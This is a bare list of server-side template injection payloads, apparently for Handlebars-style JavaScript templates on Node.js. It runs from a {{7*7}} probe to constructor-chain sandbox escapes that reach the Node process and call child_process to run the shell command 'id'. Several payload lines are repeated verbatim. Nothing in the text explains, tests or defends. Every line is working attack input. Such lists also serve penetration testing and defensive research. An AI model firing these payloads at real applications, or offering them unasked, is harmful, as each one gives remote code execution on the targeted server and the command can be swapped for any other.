{{7*7}}
{{this.constructor.constructor('return process')()}}
{{this.constructor.constructor('return global.process')()}}
{{this.constructor.constructor('return require("child_process").execSync("id").toString()')()}}
{{#with "s" as |string|}}{{#with "e"}}{{#with split as |conslist|}}{{this.pop}}{{this.push (lookup string.sub "constructor")}}{{this.pop}}{{#with string.split as |codelist|}}{{this.pop}}{{this.push "return require('child_process').exec('id')"}}{{this.pop}}{{#each conslist}}{{#with (string.sub.apply 0 codelist)}}{{this}}{{/with}}{{/each}}{{/with}}{{/with}}{{/with}}{{/with}}
{{#with (lookup this "constructor") as |c|}}{{c.constructor("return global.process.mainModule.require('child_process').execSync('id').toString()")()}}{{/with}}
{{#with (lookup this "constructor") as |c|}}{{c.constructor("return process")().mainModule.require('child_process').execSync('id').toString()}}{{/with}}
{{#with (lookup this "constructor") as |c|}}{{c.constructor("return global.process")().mainModule.require('child_process').execSync('id').toString()}}{{/with}}
{{#with (lookup this "constructor") as |c|}}{{c.constructor("return require('child_process').execSync('id').toString()")()}}{{/with}}
{{#with (lookup this "constructor") as |c|}}{{c.constructor("return global.process.mainModule.require('child_process').execSync('id').toString()")()}}{{/with}}
{{#with (lookup this "constructor") as |c|}}{{c.constructor("return global.process")().mainModule.require('child_process').execSync('id').toString()}}{{/with}}
{{#with (lookup this "constructor") as |c|}}{{c.constructor("return process")().mainModule.require('child_process').execSync('id').toString()}}{{/with}}
{{#with (lookup this "constructor") as |c|}}{{c.constructor("return require('child_process').execSync('id').toString()")()}}{{/with}}
{{#with (lookup this "constructor") as |c|}}{{c.constructor("return global.process.mainModule.require('child_process').execSync('id').toString()")()}}{{/with}}
{{#with (lookup this "constructor") as |c|}}{{c.constructor("return global.process")().mainModule.require('child_process').execSync('id').toString()}}{{/with}}
